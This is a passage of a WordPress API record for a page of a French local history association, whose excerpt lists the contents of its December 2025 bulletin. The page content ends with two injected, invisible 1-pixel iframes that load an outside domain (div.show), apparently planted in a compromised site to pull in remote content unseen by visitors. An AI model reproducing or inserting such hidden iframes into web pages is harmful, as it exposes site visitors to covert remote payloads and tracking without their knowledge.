absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>L\u2019association \u00e9dite deux bulletins par an. Vous pouvez en consulter les sommaires ci-dessous. Num\u00e9ro 47 \u2013 d\u00e9cembre 2025 \u00c9ditorial, page 1 Nos activit\u00e9s, page 2 La cuisine messine &#8211; Melfor : ce dr\u00f4le de vinaigre qui n\u2019en est pas un,&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":159,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-160","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=160"}],"version-history":[{"count":11,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/160\/revisions"}],"predecessor-version":[{"id":8787,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/160\/revisions\/8787"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/159"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}